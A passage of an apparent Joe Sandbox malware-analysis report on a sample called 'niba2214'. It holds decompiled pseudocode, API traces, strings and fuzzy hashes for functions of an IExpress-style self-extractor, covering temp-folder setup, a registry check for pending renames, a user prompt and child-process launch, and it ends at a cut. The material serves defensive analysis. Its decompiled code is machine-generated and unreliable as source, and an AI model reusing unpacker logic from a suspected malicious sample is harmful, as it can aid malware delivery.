				if(_t26 == 0) {
					_push("i386");
					L11:
					E0125658A(_t48, 0x104);
					goto L12;
				}
				_t28 = _t26 - 1;
				if(_t28 == 0) {
					_push("mips");
					goto L11;
				}
				_t29 = _t28 - 1;
				if(_t29 == 0) {
					_push("alpha");
					goto L11;
				}
				if(_t29 != 1) {
					goto L12;
				}
				_push("ppc");
				goto L11;
			}

0x01255472
0x01255479
0x01255481
0x01255484
0x0125551c
0x01255521
0x01255528
0x0125552d
0x0125552f
0x01255539
0x0125554d
0x0125554d
0x01255552
0x01255585
0x01255585
0x0125558b
0x0125558d
0x0125559d
0x0125559d
0x01255557
0x0125555e
0x00000000
0x00000000
0x01255560
0x01255566
0x01255569
0x0125556f
0x0125556f
0x01255581
0x01255581
0x00000000
0x01255581
0x01255545
0x0125557c
0x00000000
0x0125557c
0x01255547
0x00000000
0x01255547
0x0125548a
0x01255490
0x01255497
0x00000000
0x00000000
0x0125549d
0x012554ab
0x012554b4
0x012554c0
0x0125550c
0x01255511
0x01255515
0x00000000
0x01255515
0x012554c9
0x012554d6
0x012554d8
0x012554fe
0x01255503
0x01255507
0x00000000
0x01255507
0x012554da
0x012554dd
0x012554f7
0x00000000
0x012554f7
0x012554df
0x012554e2
0x012554f0
0x00000000
0x012554f0
0x012554e7
0x00000000
0x00000000
0x012554e9
0x00000000

APIs

GetSystemInfo.KERNEL32(?,?,?,?,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 012554C9
CreateDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 0125553D
RemoveDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 0125556F

Part of subcall function 012553A1: RemoveDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,?,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 012553FB
Part of subcall function 012553A1: GetFileAttributesA.KERNELBASE(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 01255402
Part of subcall function 012553A1: GetTempFileNameA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP002.TMP\,IXP,00000000,?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 0125541F
Part of subcall function 012553A1: DeleteFileA.KERNEL32(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 0125542B
Part of subcall function 012553A1: CreateDirectoryA.KERNEL32(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 01255434

Strings

alpha, xrefs: 012554F0
mips, xrefs: 012554F7
ppc, xrefs: 012554E9
i386, xrefs: 012554FE
C:\Users\user\AppData\Local\Temp\IXP002.TMP\, xrefs: 0125547D, 01255481, 012554AB, 0125551C, 0125553C, 01255568

Memory Dump Source

Source File: 00000002.00000002.308648516.0000000001251000.00000020.00000001.01000000.00000005.sdmp, Offset: 01250000, based on PE: true

Associated: 00000002.00000002.308642983.0000000001250000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.308656619.0000000001258000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.308664488.000000000125A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.308664488.000000000125C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1250000_niba2214.jbxd

Similarity

API ID: Directory$File$CreateRemove$AttributesDeleteInfoNameSystemTemp
String ID: C:\Users\user\AppData\Local\Temp\IXP002.TMP\$alpha$i386$mips$ppc
API String ID: 1979080616-1365827845
Opcode ID: dce070502079720adee62f6f82310fa3fecc970b64f0a558cd5221d0a8fcd93e
Instruction ID: 14529bd0c3f3b17fdcffa58e3f1abe964b4476e02f83c5f1cd98a0e0640929e4
Opcode Fuzzy Hash: dce070502079720adee62f6f82310fa3fecc970b64f0a558cd5221d0a8fcd93e
Instruction Fuzzy Hash: E0312C71B30316ABDFE09F3EB8C877E7B9AAF91258B14412D9E02C2144DBB4CA418791

Uniqueness

Uniqueness Score: -1.00%

Function 0125256D Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 75
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 86%

			E0125256D(signed int __ecx) {
				int _v8;
				void* _v12;
				signed int _t13;
				signed int _t19;
				long _t24;
				void* _t26;
				int _t31;
				void* _t34;

				_push(__ecx);
				_push(__ecx);
				_t13 = __ecx & 0x0000ffff;
				_t31 = 0;
				if(_t13 == 0) {
					_t31 = E012524E0(_t26);
				} else {
					_t34 = _t13 - 1;
					if(_t34 == 0) {
						_v8 = 0;
						if(RegOpenKeyExA(0x80000002, "System\\CurrentControlSet\\Control\\Session Manager\\FileRenameOperations", 0, 0x20019,  &_v12) != 0) {
							goto L7;
						} else {
							_t19 = RegQueryInfoKeyA(_v12, 0, 0, 0, 0, 0, 0,  &_v8, 0, 0, 0, 0);
							goto L6;
						}
						L12:
					} else {
						if(_t34 > 0 && __ecx <= 3) {
							_v8 = 0;
							_t24 = RegOpenKeyExA(0x80000002, "System\\CurrentControlSet\\Control\\Session Manager", 0, 0x20019,  &_v12); // executed
							if(_t24 == 0) {
								_t19 = RegQueryValueExA(_v12, "PendingFileRenameOperations", 0, 0, 0,  &_v8); // executed
								L6:
								asm("sbb eax, eax");
								_v8 = _v8 &  !( ~_t19);
								RegCloseKey(_v12); // executed
							}
							L7:
							_t31 = _v8;
						}
					}
				}
				return _t31;
				goto L12;
			}

0x01252572
0x01252573
0x01252575
0x01252578
0x0125257d
0x01252627
0x01252583
0x01252586
0x01252589
0x012525eb
0x01252607
0x00000000
0x01252609
0x0125261a
0x00000000
0x0125261a
0x00000000
0x0125258b
0x0125258b
0x0125259e
0x012525b2
0x012525ba
0x012525cb
0x012525d1
0x012525d6
0x012525da
0x012525dd
0x012525dd
0x012525e3
0x012525e3
0x012525e3
0x0125258b
0x01252589
0x0125262f
0x00000000

APIs

RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Control\Session Manager,00000000,00020019,?,00000036,01254096,01254096,?,01251ED3,00000001,00000000,?,?,01254137,?), ref: 012525B2
RegQueryValueExA.KERNELBASE(?,PendingFileRenameOperations,00000000,00000000,00000000,01254096,?,01251ED3,00000001,00000000,?,?,01254137,?,01254096), ref: 012525CB
RegCloseKey.KERNELBASE(?,?,01251ED3,00000001,00000000,?,?,01254137,?,01254096), ref: 012525DD
RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Session Manager\FileRenameOperations,00000000,00020019,?,00000036,01254096,01254096,?,01251ED3,00000001,00000000,?,?,01254137,?), ref: 012525FF
RegQueryInfoKeyA.ADVAPI32(?,00000000,00000000,00000000,00000000,00000000,00000000,01254096,00000000,00000000,00000000,00000000,?,01251ED3,00000001,00000000), ref: 0125261A

Strings

System\CurrentControlSet\Control\Session Manager\FileRenameOperations, xrefs: 012525F5
PendingFileRenameOperations, xrefs: 012525C3
System\CurrentControlSet\Control\Session Manager, xrefs: 012525A8

Memory Dump Source

Source File: 00000002.00000002.308648516.0000000001251000.00000020.00000001.01000000.00000005.sdmp, Offset: 01250000, based on PE: true

Associated: 00000002.00000002.308642983.0000000001250000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.308656619.0000000001258000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.308664488.000000000125A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.308664488.000000000125C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1250000_niba2214.jbxd

Similarity

API ID: OpenQuery$CloseInfoValue
String ID: PendingFileRenameOperations$System\CurrentControlSet\Control\Session Manager$System\CurrentControlSet\Control\Session Manager\FileRenameOperations
API String ID: 2209512893-559176071
Opcode ID: a20c1440672a5a6ed28afc47df59f77ea1af98ddd94d2e3804714c7d12a65b1f
Instruction ID: 4178c8201c93ee36ce1703ade8106feef8c7f8b9531dbba317b2ba57ee275f22
Opcode Fuzzy Hash: a20c1440672a5a6ed28afc47df59f77ea1af98ddd94d2e3804714c7d12a65b1f
Instruction Fuzzy Hash: C4118235932229FB9B749B96ACCEDFB7F7CEF017A1F504155FD09A2040D6708A44D6A0

Uniqueness

Uniqueness Score: -1.00%

Function 01256A60 Relevance: 13.6, APIs: 9, Instructions: 138
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 51%

			_entry_(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				signed int* _t25;
				signed int _t26;
				signed int _t29;
				int _t30;
				signed int _t37;
				signed char _t41;
				signed int _t53;
				signed int _t54;
				intOrPtr _t56;
				signed int _t58;
				signed int _t59;
				intOrPtr* _t60;
				void* _t62;
				void* _t67;
				void* _t68;

				E01257155();
				_push(0x58);
				_push(0x12572b8);
				E01257208(__ebx, __edi, __esi);
				 *(_t62 - 0x20) = 0;
				GetStartupInfoW(_t62 - 0x68);
				 *((intOrPtr*)(_t62 - 4)) = 0;
				_t56 =  *((intOrPtr*)( *[fs:0x18] + 4));
				_t53 = 0;
				while(1) {
					asm("lock cmpxchg [edx], ecx");
					if(0 == 0) {
						break;
					}
					if(0 != _t56) {
						Sleep(0x3e8);
						continue;
					} else {
						_t58 = 1;
						_t53 = 1;
					}
					L7:
					_t67 =  *0x12588b0 - _t58; // 0x2
					if(_t67 != 0) {
						__eflags =  *0x12588b0; // 0x2
						if(__eflags != 0) {
							 *0x12581e4 = _t58;
							goto L13;
						} else {
							 *0x12588b0 = _t58;
							_t37 = E01256C3F(0x12510b8, 0x12510c4); // executed
							__eflags = _t37;
							if(__eflags == 0) {
								goto L13;
							} else {
								 *((intOrPtr*)(_t62 - 4)) = 0xfffffffe;
								_t30 = 0xff;
							}
						}
					} else {
						_push(0x1f);
						L01256FF4();
						L13:
						_t68 =  *0x12588b0 - _t58; // 0x2
						if(_t68 == 0) {
							_push(0x12510b4);
							_push(0x12510ac);
							L01257202();
							 *0x12588b0 = 2;
						}
						if(_t53 == 0) {
							 *0x12588ac = 0;
						}
						_t71 =  *0x12588b4;
						if( *0x12588b4 != 0 && E01257060(_t71, 0x12588b4) != 0) {
							_t60 =  *0x12588b4; // 0x0
							 *0x125a288(0, 2, 0);
							 *_t60();
						}
						_t25 = __imp___acmdln; // 0x777d5b9c
						_t59 =  *_t25;
						 *(_t62 - 0x1c) = _t59;
						_t54 =  *(_t62 - 0x20);
						while(1) {
							_t41 =  *_t59;
							if(_t41 > 0x20) {
								goto L32;
							}
							if(_t41 != 0) {
								if(_t54 != 0) {
									goto L32;
								} else {
									while(_t41 != 0 && _t41 <= 0x20) {
										_t59 = _t59 + 1;
										 *(_t62 - 0x1c) = _t59;
										_t41 =  *_t59;
									}
								}
							}
							__eflags =  *(_t62 - 0x3c) & 0x00000001;
							if(( *(_t62 - 0x3c) & 0x00000001) == 0) {
								_t29 = 0xa;
							} else {
								_t29 =  *(_t62 - 0x38) & 0x0000ffff;
							}
							_push(_t29);
							_t30 = E01252BFB(0x1250000, 0, _t59); // executed
							 *0x12581e0 = _t30;
							__eflags =  *0x12581f8;
							if( *0x12581f8 == 0) {
								exit(_t30); // executed
								goto L32;
							}
							__eflags =  *0x12581e4;
							if( *0x12581e4 == 0) {
								__imp___cexit();
								_t30 =  *0x12581e0; // 0x0
							}
							 *((intOrPtr*)(_t62 - 4)) = 0xfffffffe;
							goto L40;
							L32:
							__eflags = _t41 - 0x22;
							if(_t41 == 0x22) {
								__eflags = _t54;
								_t15 = _t54 == 0;
								__eflags = _t15;
								_t54 = 0 | _t15;
								 *(_t62 - 0x20) = _t54;
							}
							_t26 = _t41 & 0x000000ff;
							__imp___ismbblead(_t26);
							__eflags = _t26;
							if(_t26 != 0) {
								_t59 = _t59 + 1;
								__eflags = _t59;
								 *(_t62 - 0x1c) = _t59;
							}
							_t59 = _t59 + 1;
							 *(_t62 - 0x1c) = _t59;
						}
					}
					L40:
					return E0125724D(_t30);
				}
				_t58 = 1;
				__eflags = 1;
				goto L7;
			}

0x01256a60
0x01256a6a
0x01256a6c
0x01256a71
0x01256a78
0x01256a7f
0x01256a85
0x01256a8e
0x01256a91
0x01256a93
0x01256a9c
0x01256aa2
0x00000000
0x00000000
0x01256aa6
0x01256ab4
0x00000000
0x01256aa8
0x01256aaa
0x01256aab
0x01256aab
0x01256abf
0x01256abf
0x01256ac5
0x01256ad1
0x01256ad7
0x01256b05
0x00000000
0x01256ad9
0x01256ad9
0x01256ae9
0x01256af0
0x01256af2
0x00000000
0x01256af4
0x01256af4
0x01256afb
0x01256afb
0x01256af2
0x01256ac7
0x01256ac7
0x01256ac9
0x01256b0b
0x01256b0b
0x01256b11
0x01256b13
0x01256b18
0x01256b1d
0x01256b24
0x01256b24
0x01256b30
0x01256b39
0x01256b39
0x01256b3b
0x01256b42
0x01256b57
0x01256b5f
0x01256b65
0x01256b65
0x01256b67
0x01256b6c
0x01256b6e
0x01256b71
0x01256b74
0x01256b74
0x01256b79
0x00000000
0x00000000
0x01256b7d
0x01256b81
0x00000000
0x00000000
0x01256b83
0x01256b8c
0x01256b8d
0x01256b90
0x01256b90
0x01256b83
0x01256b81
0x01256b94
0x01256b98
0x01256ba2
0x01256b9a
0x01256b9a
0x01256b9a
0x01256ba3
0x01256bab
0x01256bb0
0x01256bb5
0x01256bbc
0x01256bbf
0x00000000
0x01256bbf
0x01256c1e
0x01256c25
0x01256c27
0x01256c2d
0x01256c2d
0x01256c32
0x00000000
0x01256bc5
0x01256bc5
0x01256bc8
0x01256bcc
0x01256bce
0x01256bce
0x01256bd1
0x01256bd3
0x01256bd3
0x01256bd6
0x01256bda
0x01256be1
0x01256be3
0x01256be5
0x01256be5
0x01256be6
0x01256be6
0x01256be9
0x01256bea
0x01256bea
0x01256b74
0x01256c39
0x01256c3e
0x01256c3e
0x01256abe
0x01256abe
0x00000000

APIs

Part of subcall function 01257155: GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 01257182
Part of subcall function 01257155: GetCurrentProcessId.KERNEL32 ref: 01257191
Part of subcall function 01257155: GetCurrentThreadId.KERNEL32 ref: 0125719A
Part of subcall function 01257155: GetTickCount.KERNEL32 ref: 012571A3
Part of subcall function 01257155: QueryPerformanceCounter.KERNEL32(?), ref: 012571B8

GetStartupInfoW.KERNEL32(?,012572B8,00000058), ref: 01256A7F
Sleep.KERNEL32(000003E8), ref: 01256AB4
_amsg_exit.MSVCRT ref: 01256AC9
_initterm.MSVCRT ref: 01256B1D
__IsNonwritableInCurrentImage.LIBCMT ref: 01256B49
exit.KERNELBASE ref: 01256BBF
_ismbblead.MSVCRT ref: 01256BDA

Memory Dump Source

Source File: 00000002.00000002.308648516.0000000001251000.00000020.00000001.01000000.00000005.sdmp, Offset: 01250000, based on PE: true

Associated: 00000002.00000002.308642983.0000000001250000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.308656619.0000000001258000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.308664488.000000000125A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.308664488.000000000125C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1250000_niba2214.jbxd

Similarity

API ID: Current$Time$CountCounterFileImageInfoNonwritablePerformanceProcessQuerySleepStartupSystemThreadTick_amsg_exit_initterm_ismbbleadexit
String ID:
API String ID: 836923961-0
Opcode ID: 9f9aef7f78279f48e10cd57d0dc5f8c3941fe87b7e0b9433cbe8169cde155ac6
Instruction ID: 1ed27b334e19fc2fece206adb59018010cc6241d29d0b0901b0759a15665214b
Opcode Fuzzy Hash: 9f9aef7f78279f48e10cd57d0dc5f8c3941fe87b7e0b9433cbe8169cde155ac6
Instruction Fuzzy Hash: B641C6319743268BEBB19B6AE8CD77A7BA0FB44761F94411AEE01E7284DBB048408B51

Uniqueness

Uniqueness Score: -1.00%

Function 012558C8 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 74
memoryfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 95%

			E012558C8(intOrPtr* __ecx) {
				void* _v8;
				intOrPtr _t6;
				void* _t10;
				void* _t12;
				void* _t14;
				signed char _t16;
				void* _t20;
				void* _t23;
				intOrPtr* _t27;
				CHAR* _t33;

				_push(__ecx);
				_t33 = __ecx;
				_t27 = __ecx;
				_t23 = __ecx + 1;
				do {
					_t6 =  *_t27;
					_t27 = _t27 + 1;
				} while (_t6 != 0);
				_t36 = _t27 - _t23 + 0x14;
				_t20 = LocalAlloc(0x40, _t27 - _t23 + 0x14);
				if(_t20 != 0) {
					E01251680(_t20, _t36, _t33);
					E0125658A(_t20, _t36, "TMP4351$.TMP");
					_t10 = CreateFileA(_t20, 0x40000000, 0, 0, 1, 0x4000080, 0); // executed
					_v8 = _t10;
					LocalFree(_t20);
					_t12 = _v8;
					if(_t12 == 0xffffffff) {
						goto L4;
					} else {
						CloseHandle(_t12);
						_t16 = GetFileAttributesA(_t33); // executed
						if(_t16 == 0xffffffff || (_t16 & 0x00000010) == 0) {
							goto L4;
						} else {
							 *0x1259124 = 0;
							_t14 = 1;
						}
					}
				} else {
					E012544B9(0, 0x4b5, 0, 0, 0x10, 0);
					L4:
					 *0x1259124 = E01256285();
					_t14 = 0;
				}
				return _t14;
			}

0x012558cd
0x012558d1
0x012558d3
0x012558d5
0x012558d8
0x012558d8
0x012558da
0x012558db
0x012558e1
0x012558ed
0x012558f1
0x0125591e
0x0125592c
0x01255943
0x0125594a
0x0125594d
0x01255953
0x01255959
0x00000000
0x0125595b
0x0125595c
0x01255963
0x0125596c
0x00000000
0x01255972
0x01255974
0x0125597a
0x0125597a
0x0125596c
0x012558f3
0x01255901
0x01255906
0x0125590b
0x01255910
0x01255910
0x01255918

APIs

LocalAlloc.KERNEL32(00000040,?,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,?,01255534,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 012558E7
CreateFileA.KERNELBASE(00000000,40000000,00000000,00000000,00000001,04000080,00000000,TMP4351$.TMP,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,?,01255534,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 01255943
LocalFree.KERNEL32(00000000,?,01255534,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 0125594D
CloseHandle.KERNEL32(00000000,?,01255534,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 0125595C
GetFileAttributesA.KERNELBASE(C:\Users\user\AppData\Local\Temp\IXP002.TMP\,?,01255534,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 01255963

Strings

C:\Users\user\AppData\Local\Temp\IXP002.TMP\, xrefs: 012558CD, 012558CF, 01255919, 01255962
TMP4351$.TMP, xrefs: 01255923

Memory Dump Source

Source File: 00000002.00000002.308648516.0000000001251000.00000020.00000001.01000000.00000005.sdmp, Offset: 01250000, based on PE: true

Associated: 00000002.00000002.308642983.0000000001250000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.308656619.0000000001258000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.308664488.000000000125A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.308664488.000000000125C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1250000_niba2214.jbxd

Similarity

API ID: FileLocal$AllocAttributesCloseCreateFreeHandle
String ID: C:\Users\user\AppData\Local\Temp\IXP002.TMP\$TMP4351$.TMP
API String ID: 747627703-1005797265
Opcode ID: 6f3719ca2126e7034aca18ba2771e49745ed5c276cd49197101c326222204d2c
Instruction ID: e9e3adbfb76a55976a284896d59df37492d4655fae924917c567ae1e96e5b949
Opcode Fuzzy Hash: 6f3719ca2126e7034aca18ba2771e49745ed5c276cd49197101c326222204d2c
Instruction Fuzzy Hash: 991138316203217BDB701E7EACCDBAB7EADDF46270B104619FA06D3184CA74880587E0

Uniqueness

Uniqueness Score: -1.00%

Function 01253FEF Relevance: 10.6, APIs: 7, Instructions: 97
processsynchronizationwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 84%

			E01253FEF(CHAR* __ecx, struct _STARTUPINFOA* __edx) {
				signed int _v8;
				char _v524;
				long _v528;
				struct _PROCESS_INFORMATION _v544;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t20;
				void* _t22;
				int _t25;
				intOrPtr* _t39;
				signed int _t44;
				void* _t49;
				signed int _t50;
				intOrPtr _t53;

				_t45 = __edx;
				_t20 =  *0x1258004; // 0x958f311c
				_v8 = _t20 ^ _t50;
				_t39 = __ecx;
				_t49 = 1;
				_t22 = 0;
				if(__ecx == 0) {
					L13:
					return E01256CE0(_t22, _t39, _v8 ^ _t50, _t45, 0, _t49);
				}
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t25 = CreateProcessA(0, __ecx, 0, 0, 0, 0x20, 0, 0, __edx,  &_v544); // executed
				if(_t25 == 0) {
					 *0x1259124 = E01256285();
					FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v524, 0x200, 0);
					_t45 = 0x4c4;
					E012544B9(0, 0x4c4, _t39,  &_v524, 0x10, 0);
					L11:
					_t49 = 0;
					L12:
					_t22 = _t49;
					goto L13;
				}
				WaitForSingleObject(_v544.hProcess, 0xffffffff);
				_t34 = GetExitCodeProcess(_v544.hProcess,  &_v528); // executed
				_t44 = _v528;
				_t53 =  *0x1258a28; // 0x0
				if(_t53 == 0) {
					_t34 =  *0x1259a2c; // 0x0
					if((_t34 & 0x00000001) != 0 && (_t34 & 0x00000002) == 0) {
						_t34 = _t44 & 0xff000000;
						if((_t44 & 0xff000000) == 0xaa000000) {
							 *0x1259a2c = _t44;
						}
					}
				}
				E0125411B(_t34, _t44);
				CloseHandle(_v544.hThread);
				CloseHandle(_v544);
				if(( *0x1259a34 & 0x00000400) == 0 || _v528 >= 0) {
					goto L12;
				} else {
					goto L11;
				}
			}

0x01253fef
0x01253ffa
0x01254001
0x01254008
0x0125400a
0x0125400b
0x01254010
0x0125410a
0x0125411a
0x0125411a
0x0125401c
0x0125401d
0x0125401e
0x0125401f
0x01254033
0x0125403b
0x012540ca
0x012540e9
0x012540f8
0x01254101
0x01254106
0x01254106
0x01254108
0x01254108
0x00000000
0x01254108
0x01254049
0x0125405c
0x01254062
0x01254068
0x0125406e
0x01254070
0x01254077
0x0125407f
0x01254089
0x0125408b
0x0125408b
0x01254089
0x01254077
0x01254091
0x0125409c
0x012540a8
0x012540b8
0x00000000
0x012540c2
0x00000000
0x012540c2

APIs

CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?,?,?,00000000), ref: 01254033
WaitForSingleObject.KERNEL32(?,000000FF), ref: 01254049
GetExitCodeProcess.KERNELBASE ref: 0125405C
CloseHandle.KERNEL32(?), ref: 0125409C
CloseHandle.KERNEL32(?), ref: 012540A8
GetLastError.KERNEL32(00000000,?,00000200,00000000), ref: 012540DC
FormatMessageA.KERNEL32(00001000,00000000,00000000), ref: 012540E9

Memory Dump Source

Source File: 00000002.00000002.308648516.0000000001251000.00000020.00000001.01000000.00000005.sdmp, Offset: 01250000, based on PE: true

Associated: 00000002.00000002.308642983.0000000001250000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.308656619.0000000001258000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.308664488.000000000125A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.308664488.000000000125C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1250000_niba2214.jbxd

Similarity

API ID: CloseHandleProcess$CodeCreateErrorExitFormatLastMessageObjectSingleWait
String ID:
API String ID: 3183975587-0
Opcode ID: ac1a84d0dcfb7596da19da17493e553d06e0ff52029ce832239c3b1efdcd8d2f
Instruction ID: e35267fbde0eff89e8b55e183790c1a8320a4cb52ff052c86897792f977057b8
Opcode Fuzzy Hash: ac1a84d0dcfb7596da19da17493e553d06e0ff52029ce832239c3b1efdcd8d2f
Instruction Fuzzy Hash: 8D31B331650359ABEF70AA65ECCDFBBBB78EB94710F204159FA05E2150DA304D81CB20

Uniqueness

Uniqueness Score: -1.00%

Function 012551E5 Relevance: 10.6, APIs: 5, Strings: 2, Instructions: 74
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E012551E5(void* __eflags) {
				int _t5;
				void* _t6;
				void* _t28;

				_t1 = E0125468F("UPROMPT", 0, 0) + 1; // 0x1
				_t28 = LocalAlloc(0x40, _t1);
				if(_t28 != 0) {
					if(E0125468F("UPROMPT", _t28, _t29) != 0) {
						_t5 = lstrcmpA(_t28, "<None>"); // executed
						if(_t5 != 0) {
							_t6 = E012544B9(0, 0x3e9, _t28, 0, 0x20, 4);
							LocalFree(_t28);
							if(_t6 != 6) {
								 *0x1259124 = 0x800704c7;
								L10:
								return 0;
							}
							 *0x1259124 = 0;
							L6:
							return 1;
						}
						LocalFree(_t28);
						goto L6;
					}
					E012544B9(0, 0x4b1, 0, 0, 0x10, 0);
					LocalFree(_t28);
					 *0x1259124 = 0x80070714;
					goto L10;
				}
				E012544B9(0, 0x4b5, 0, 0, 0x10, 0);
				 *0x1259124 = E01256285();
				goto L10;
			}

0x012551fb
0x01255207
0x0125520b
0x0125523c
0x01255268
0x01255270
0x0125528b
0x01255293
0x0125529c
0x012552a6
0x012552b0
0x00000000
0x012552b0
0x0125529e
0x01255279
0x00000000
0x0125527b
0x01255273
0x00000000
0x01255273
0x0125524a
0x01255250
0x01255256
0x00000000
0x01255256
0x01255219
0x01255223
0x00000000

APIs

Part of subcall function 0125468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 012546A0
Part of subcall function 0125468F: SizeofResource.KERNEL32(00000000,00000000,?,01252D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 012546A9
Part of subcall function 0125468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 012546C3
Part of subcall function 0125468F: LoadResource.KERNEL32(00000000,00000000,?,01252D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 012546CC
Part of subcall function 0125468F: LockResource.KERNEL32(00000000,?,01252D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 012546D3
Part of subcall function 0125468F: memcpy_s.MSVCRT ref: 012546E5
Part of subcall function 0125468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 012546EF

LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,01252F4D,?,00000002,00000000), ref: 01255201
LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000,00000000), ref: 01255250

Part of subcall function 012544B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 01254518
Part of subcall function 012544B9: MessageBoxA.USER32(?,?,siga30,00010010), ref: 01254554

Part of subcall function 01256285: GetLastError.KERNEL32(01255BBC), ref: 01256285

Strings

<None>, xrefs: 01255262
UPROMPT, xrefs: 012551EF, 01255230

Memory Dump Source

Source File: 00000002.00000002.308648516.0000000001251000.00000020.00000001.01000000.00000005.sdmp, Offset: 01250000, based on PE: true

Associated: 00000002.00000002.308642983.0000000001250000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.308656619.0000000001258000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.308664488.000000000125A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.308664488.000000000125C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1250000_niba2214.jbxd

Similarity

API ID: Resource$FindFreeLoadLocal$AllocErrorLastLockMessageSizeofStringmemcpy_s
String ID: <None>$UPROMPT
API String ID: 957408736-2980973527
Opcode ID: 0784a46e8101521622d4b997f8d4298b83082e2c3c8914908272c29968627e25
Instruction ID: 5ec0320e0ca1d8a35cf80dd9bf426d9d84312ea38d4750bbbba2907318aa4703
Opcode Fuzzy Hash: 0784a46e8101521622d4b997f8d4298b83082e2c3c8914908272c29968627e25
Instruction Fuzzy Hash: 3A11B975270302BFDBE56A756CC9B3B759DDB882D4B00442DBF42D6184EAB99C414734

Uniqueness

Uniqueness Score: -1.00%

Function 012552B6 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 65
fileCOMMON

Download Yara Rule

C-Code - Quality: 74%

